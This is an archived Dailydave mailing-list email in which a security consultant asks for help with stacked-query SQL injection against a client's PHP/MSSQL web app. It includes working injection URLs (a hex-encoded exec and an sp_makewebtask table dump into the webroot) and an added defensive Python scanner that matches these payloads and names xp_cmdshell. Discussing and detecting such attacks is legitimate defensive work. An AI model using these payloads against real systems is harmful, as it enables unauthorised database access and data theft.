<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<STYLE type=text/css>DIV {
        MARGIN: 0px
}
</STYLE>
<META content="MSHTML 6.00.5730.11" name=GENERATOR></HEAD>
<BODY>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>I am more familiar with MySQL, but could there be a case
that the database/application is locking the table during the first stored
procedure run? If it doesn't properly unlock the table after it's finished
(assuming your injection would have to make sure that happens) then it can
essentially block the server from allowing access to that table
again.</FONT></SPAN></DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2></FONT></SPAN> </DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>I would check the source to see what they are doing for
locking, I might totally be out to lunch, but I have seen lots of PHP apps
improperly lock and unlock, causing all sorts of bizarre
problems.</FONT></SPAN></DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2></FONT></SPAN> </DIV>
<DIV dir=ltr align=left><SPAN class=906522521-18102007><FONT face=Arial
color=#0000ff size=2>JS</FONT></SPAN></DIV><BR>
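<DIV dir=ltr align=left><FONT face=Arial size=2>The two injected URLs in the quoted message below double as test input for detection. As an added example, not code from anyone in this thread, the Python below URL-decodes each request's query string, flags the stacked-query shape (a semicolon followed by a T-SQL keyword or procedure call), lists the MSSQL procedures named in the thread, and decodes the 0x... hex literal to show the quote-free string it carries. The access-log lines are constructed from the thread's URLs.</FONT></DIV>

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines, built from the two request URLs quoted in the thread.
ACCESS_LOG = [
    '10.0.0.5 - - [18/Oct/2007:13:00:01 -0500] "GET /mod.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Oct/2007:13:00:07 -0500] "GET /mod.php?id=1;begin%20declare%20@q%20varchar%288000%29select%20@q%20=%200x73656c65637420404076657273696f6e%20exec%28@q%29%20end;-- HTTP/1.1" 500 301',
    '10.0.0.9 - - [18/Oct/2007:13:00:12 -0500] "GET /mod.php?id=1;exec%20sp_makewebtask%20%5Bc:%5Cinetpub%5Cwwwroot%5Csssssssss%5Cindex_olld.html%5D,%20%5Bselect%20*%20from%20TABLE%5D;-- HTTP/1.1" 500 301',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A ';' followed by a T-SQL batch keyword or procedure call: the stacked-query shape both payloads use.
STACKED_RE = re.compile(r';\s*(begin|declare|exec|execute|select|insert|update|delete|drop)\b', re.I)
# MSSQL procedures named in the thread, listed explicitly.
PROC_RE = re.compile(r'\b(sp_makewebtask|xp_cmdshell)\b', re.I)
HEX_LITERAL_RE = re.compile(r'0x([0-9a-f]{2,})\b', re.I)

def decode_hex_literals(sql):
    """Return the ASCII text hidden in 0x... literals (the quote-free string trick)."""
    out = []
    for match in HEX_LITERAL_RE.finditer(sql):
        try:
            out.append(bytes.fromhex(match.group(1)).decode('ascii'))
        except (ValueError, UnicodeDecodeError):
            continue  # odd length or non-text bytes: not a hidden string
    return out

def analyze_request(target):
    """Classify one request target; returns None when nothing suspicious is found."""
    decoded = unquote(urlsplit(target).query)  # one pass: the thread's payloads are single-encoded
    findings = {}
    m = STACKED_RE.search(decoded)
    if m:
        findings['stacked_query'] = m.group(1).lower()
    procs = PROC_RE.findall(decoded)
    if procs:
        findings['procedures'] = [p.lower() for p in procs]
    hidden = decode_hex_literals(decoded)
    if hidden:
        findings['hex_decoded'] = hidden
    return findings or None

def scan_log(lines):
    """Return (client_ip, findings) for each request in the log that trips a rule."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        findings = analyze_request(m.group(1)) if m else None
        if findings:
            hits.append((line.split()[0], findings))
    return hits
```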
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #0000ff 2px solid; MARGIN-RIGHT: 0px">
<DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left>
<HR tabIndex=-1>
<FONT face=Tahoma size=2><B>From:</B> dailydave-bounces@lists.immunitysec.com
[mailto:dailydave-bounces@lists.immunitysec.com] <B>On Behalf Of </B>H. Daniel
Regalado Arias<BR><B>Sent:</B> Thursday, October 18, 2007 1:00
PM<BR><B>To:</B> Dave Aitel; dailydave<BR><B>Subject:</B> [Dailydave] SQL
Injection - Strange Result<BR></FONT><BR></DIV>
<DIV></DIV>
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman, new york, times, serif">Hi
Dave and Friends, I have a problem while doing a PHP / MSSQL 2000 web app
assessment. After many days, and due to my lack of experience, I am able to
bypass single quotes using char() or "[]" when trying to execute a stored
procedure, so by now I am able to inject code directly into the database
without being filtered, but after sending the next test:<BR><BR><SPAN><A
href="http://www.client.com/mod.php?id=1;begin%20declare%20@q%20varchar%288000%29select%20@q%20=%200x73656c65637420404076657273696f6e%20exec%28@q%29%20end"
target=_blank>http://www.client.com/mod.php?id=1;begin%20declare%20@q%20varchar(8000)select%20@q%20=%200x73656c65637420404076657273696f6e%20exec(@q)%20end</A>;--</SPAN><BR><BR>or
another stored procedure like:<BR><BR><SPAN><A
href="http://www.client.com/mod.php?id=1;exec%20sp_makewebtask%20%5Bc:%5Cinetpub%5Cwwwroot%5Csssssssss%5Cindex_olld.html%5D,%20%5Bselect%20*%20from%20TABLE%5D"
target=_blank>http://www.client.com/mod.php?id=1;exec%20sp_makewebtask%20%5Bc:\inetpub\wwwroot\sssssssss\index_olld.html%5D,%20%5Bselect%20*%20from%20TABLE%5D</A>;--</SPAN><BR><BR>the
application responds with something like:<BR>SQL error: [Microsoft][ODBC SQL
Server Driver]Connection is busy with results for another hstmt, SQL state
S1000 in SQLExecDirect in <B>C:\D\Inetpub\wwwroot\sssssssssss</B><BR>
<DIV><BR>I think it's because of the first query (the one that belongs to the id=1
parameter, even though 1 returns 0 rows).<BR>I have read a lot on SQL
injection .. Advanced, More, and so on, but all of them always execute a stored
procedure after a semicolon, and none of them says anything about this
error.<BR><BR>I thought of putting a delay before my stored procedure, or a command
to free the database connection handle.<BR><BR>What do you think???<BR><BR>By
the way, I am not able to run xp_cmdshell because of the database user
permissions; maybe I could try to elevate privileges, but the error
described above always appears.<BR><BR>Thanks in advance.<BR> </DIV>H. Daniel
Regalado Arias, CISSP<BR>Chief Information Security Officer<BR>Macula Security
Consulting Group<BR>www.macula-group.com
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman,new york,times,serif"><BR><BR>
<DIV
style="FONT-SIZE: 12pt; FONT-FAMILY: times new roman,new york,times,serif">-----
Original Message ----<BR>From: Dave Aitel &lt;dave@immunityinc.com&gt;<BR>To:
dailydave &lt;dailydave@lists.immunitysec.com&gt;<BR>Sent: Thursday, October 18,
2007 12:40:06<BR>Subject: [Dailydave] SQL Hooker
Release<BR><BR><A
href="http://forum.immunityinc.com/index.php?topic=92.0"
target=_blank>http://forum.immunityinc.com/index.php?topic=92.0</A><BR><BR>JMS
and I decided to put our code where our mouth was.<BR><BR>It looks a lot like
this:<BR>PyCommands $ python sql_listener.py 80812.4<BR>Set up XMLRPC Socket
on 0.0.0.0 port 8081<BR>select count(*) from users where userName='cow' and
userPass='boy'<BR>10.10.10.243 - - [18/Oct/2007 13:03:17] "POST / HTTP/1.0"
200 -<BR><BR>Next up - file operation hooking perhaps? :><BR><BR>-dave<BR><BR>_______________________________________________<BR>Dailydave
mailing list<BR><A href="mailto:Dailydave@lists.immunitysec.com"
ymailto="mailto:Dailydave@lists.immunitysec.com">Dailydave@lists.immunitysec.com</A><BR><A
href="http://lists.immunitysec.com/mailman/listinfo/dailydave"
target=_blank>http://lists.immunitysec.com/mailman/listinfo/dailydave</A><BR></DIV><BR></DIV></DIV><BR>
</BLOCKQUOTE></BODY></HTML>